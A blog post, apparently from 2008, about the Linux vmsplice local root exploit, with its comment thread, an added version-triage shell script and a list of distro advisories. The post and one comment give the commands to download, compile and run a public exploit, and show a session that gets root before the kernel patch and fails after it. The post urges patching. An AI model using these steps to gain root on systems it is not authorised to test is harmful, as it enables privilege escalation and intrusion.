Yes, everyone was talking about the Linux vmsplice Local Root Exploit. Izhar, Erek Dyskant and Aphesz have already experienced it.
Here is my experience on my Debian (Testing), before & after the kernel update.
Prologue
mij@unforgiven:/tmp$ uname -r; cat /etc/debian_version; id
2.6.22-3-amd64
lenny/sid
uid=1000(mij) gid=1000(mij) groups=20(dialout),24(cdrom),25(floppy),29(audio),44(video),46(plugdev),1000(mij)
mij@unforgiven:/tmp$ wget http://downloads.securityfocus.com/vulnerabilities/exploits/27704.c
mij@unforgiven:/tmp$ gcc 27704.c -o exploit
Before Kernel Update
mij@unforgiven:/tmp$ ./exploit
-----------------------------------
Linux vmsplice Local Root Exploit
By qaaz
-----------------------------------
[+] mmap: 0x100000000000 .. 0x100000001000
[+] page: 0x100000000000
[+] page: 0x100000000038
[+] mmap: 0x4000 .. 0x5000
[+] page: 0x4000
[+] page: 0x4038
[+] mmap: 0x1000 .. 0x2000
[+] page: 0x1000
[+] mmap: 0x2b344e19a000 .. 0x2b344e1cc000
[+] root
root@unforgiven:/tmp# id
uid=0(root) gid=0(root) groups=20(dialout),24(cdrom),25(floppy),29(audio),44(video),46(plugdev),1000(mij)
After Kernel Update
mij@unforgiven:/tmp$ ./exploit
-----------------------------------
Linux vmsplice Local Root Exploit
By qaaz
-----------------------------------
[+] mmap: 0x100000000000 .. 0x100000001000
[+] page: 0x100000000000
[+] page: 0x100000000038
[+] mmap: 0x4000 .. 0x5000
[+] page: 0x4000
[+] page: 0x4038
[+] mmap: 0x1000 .. 0x2000
[+] page: 0x1000
[+] mmap: 0x2b7bfe66f000 .. 0x2b7bfe6a1000
[-] vmsplice: Bad address
mij@unforgiven:/tmp$ id
uid=1000(mij) gid=1000(mij) groups=20(dialout),24(cdrom),25(floppy),29(audio),44(video),46(plugdev),1000(mij)
So, the moral of the story is: UPDATE YOUR KERNEL now. Below are the security advisories:
- Debian: DSA-1494-1 linux-2.6 — missing access checks
- Red Hat: [RHSA-2008:0129-01] Important: kernel security update
- SuSE: SUSE Security Announcement: Linux kernel (SUSE-SA:2008:007)
To Debian users: please take note that this bug has been fixed in the Stable & Testing distributions. As for Unstable (Sid), I'm not sure.
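A version-triage script, added here as an example and not part of the original post: it parses a kernel release string of the kind `uname -r` prints in the Prologue above and reports whether the upstream version falls inside the range a commenter below quotes as affected (2.6.17 up to and including 2.6.24.1). The function names and the sample strings are my own. One caveat: a distribution's fixed kernel package usually keeps the same upstream version number and only bumps the package revision, so a hit from this script means "compare the installed package version with your distro's advisory (DSA-1494-1, RHSA-2008:0129-01, SUSE-SA:2008:007)", not that the machine is still exploitable.

```shell
#!/bin/sh
# Added example (not from the original post): triage a kernel release
# string against the upstream version range quoted in the comment
# thread for the vmsplice bug: 2.6.17 up to and including 2.6.24.1.
# Function names and the constructed sample strings are my own.

# Turn the leading numeric part of a release string into a sortable
# integer: "2.6.22-3-amd64" -> 206022000, "2.6.24.1" -> 206024001.
kver_key() {
    base=$(printf '%s\n' "$1" | sed 's/[^0-9.].*$//')
    # split on dots; missing fields default to 0
    set -- $(printf '%s\n' "$base" | tr '.' ' ')
    printf '%d\n' $(( ${1:-0} * 100000000 + ${2:-0} * 1000000 + ${3:-0} * 1000 + ${4:-0} ))
}

# Exit status 0 when the upstream version is inside [2.6.17, 2.6.24.1].
vmsplice_version_in_range() {
    k=$(kver_key "$1")
    lo=$(kver_key 2.6.17)
    hi=$(kver_key 2.6.24.1)
    if [ "$k" -ge "$lo" ] && [ "$k" -le "$hi" ]; then
        return 0
    fi
    return 1
}

# Human-readable verdict for one release string. A hit means "compare
# the installed kernel package version with the distro advisory"; the
# upstream number alone cannot show whether a backported fix is present.
vmsplice_verdict() {
    if vmsplice_version_in_range "$1"; then
        printf '%s: upstream version inside the affected range; check the package version against your distro advisory\n' "$1"
    else
        printf '%s: upstream version outside the affected range\n' "$1"
    fi
}

# Demo: the live kernel first, then constructed samples (the two Debian
# strings mirror the ones mentioned on this page).
if [ -z "$KVER_NO_DEMO" ]; then
    vmsplice_verdict "$(uname -r)"
    for v in 2.6.22-3-amd64 2.6.22-3-686 2.6.24.1 2.6.24.2 2.6.16.62 2.6.25-rc1; do
        vmsplice_verdict "$v"
    done
fi
```

Run it as `sh vmsplice-triage.sh`; set `KVER_NO_DEMO=1` to source only the functions. The key packs four numeric fields into one integer so that ordinary integer comparison in `[` gives correct version ordering, and everything after the first non-digit (`-3-amd64`, `-rc1`) is deliberately ignored because only the upstream part is being classified.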
21 Comments
No need to be so paranoid,
if it's only on that laptop.
Oh dear, this patin fish is such a geek
Hey.. I'm a patin too!
Onward, patin fish, for the nation
Oh. Sysadmins really are geeks.. btw I like spamming comments here.. delicious
Imagine if some sysadmin tested it like this:-
root@Kenari:/var/www/lilina-0.7# ./exploit
bash: ./exploit: No such file or directory
and then declared himself safe
Hi there, new to Linux and searching high and low on Google. Many talks but none simple enough for a new user to try and understand the whole thing.
What about a short howto to show :
1. how to test if our system is affected by this security hole (which definitely is)
2. how to do the kernel update to cover this hole (a good learning experience)
Definitely would benefit a lot of your blog subscribers who are keen to learn but are new to Linux.
:-)
Cae,
Q: how to test if our system is affected by this security hole (which definitely is)
A: If you’re using Kernel 2.6.17 – 2.6.24.1, then there’s a high chance that you’re affected.
Q: how to do the kernel update to cover this hole (a good learning experience)
A: It depends on your Linux distro, consult the documentation. If RedHat-based, it's normally "rpm -ivh new_kernel". If Debian-based, just "apt-get update && apt-get upgrade". Again, consult the docs/manual. The bottom line is: update/upgrade your kernel!
As I've said earlier, my Debian (2.6.22-3-686) installation is definitely affected :-)
Any chance of sharing a simple step by step howto to test for the security hole?
Cae,
I've written VERY SIMPLE instructions in my post to see how the exploit works. You just have to download the code, compile it, and run the binary as a normal user. After that, you should be able to get root.
Irwan, that’s the funny part.
I am a totally non-technical person and so your VERY SIMPLE "compile and run" is alien to me, but something I am interested to learn.
Care to share :-)
Also, this shows how user-friendly Debian is: a non-techie like me can get it installed and use it as a full-time desktop.
Dear Cae,
Q: how to test if our system is affected by this security hole (which definitely is)
A: follow these steps
1) wget http://downloads.securityfocus.com/vulnerabilities/exploits/27704.c
2) gcc 27704.c -o exploit
3) ./exploit
Q: how to do the kernel update to cover this hole (a good learning experience)
A: I believe it has something to do with a stack overflow which allows a normal user to perform a system call to become root. The patches might change the memory address or maybe randomize it so that the exploit won't work.
So many patin fish here.
Could set up a pond to farm patin
Oi, all you patins,
I'm going to gut you all
Don't… the sysadmin will get angry
Pfft. Why would he get angry
Hi Xanda,
now I understand why Irwan is fuming :-)
he already wrote a VERY SIMPLE howto, it's just that I really did not know it was there! LOL.
your 3 steps did the magic, THANK YOU!
by the way, saya dak tahu malayu (meaning "I don't know Malay")
hope I got the above sentence right :-)
Cheers
Xanda & Piju/Dolphin,
Truly, the patin fish is not at fault in this matter. The patin fish also has nothing to do with the Linux vmsplice Local Root Exploit &, most importantly, the patin fish is not as "g33k" as the two of you :D
Cae,
It's nice to see a non-techie using Debian. As far as I know, non-techies prefer Ubuntu to Debian. As a Singaporean, you might want to join the Linux User Group there :)
Gentoo rocks.. (once upon a time)
oh yes… the patin fish boss uses Gentoo
ah,
if it's anything to do with Temerloh / patin,
you two are my targets
don't forget, oh patin fish "sekalin"…
*sekalian (correcting the typo above; "all of you")